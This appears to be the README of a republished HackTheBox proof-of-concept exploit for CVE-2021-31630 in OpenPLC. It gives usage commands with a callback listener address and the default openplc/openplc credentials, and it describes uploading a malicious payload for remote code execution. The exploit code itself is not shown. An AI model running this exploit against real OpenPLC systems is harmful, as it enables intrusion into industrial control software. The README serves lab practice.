This PoC was originally developed by Hunt3r0x but I found the political messages to be, quite unnecessary for a HackTheBox PoC so I republished it removing that as well as fixing some typos.
python exploit.py -ip <IP_ADDRESS_FOR_LISTEN> -p <PORT_FOR_LISTEN> -u <USERNAME> -pwd <PASSWORD>
python ./exploit.py -ip 10.10.16.5 -p 1337 -u openplc -pwd openplc
-ip
<IP_ADDRESS>: Specifies the IP address to listen on.-p
: Specifies the port to listen on.-u
: Specifies the username for OpenPLC login.-pwd
: Specifies the password for OpenPLC login.
This script exploits the CVE-2021-31630 vulnerability in OpenPLC, allowing remote code execution on the WifineticTwo box. It establishes a connection to the target IP and port, authenticates with the provided username and password, and uploads a malicious payload to execute arbitrary code.
Created by z1ntrx, modified by sealldev
This script is intended for educational and testing purposes only. Use it responsibly and only on systems you have explicit permission to test.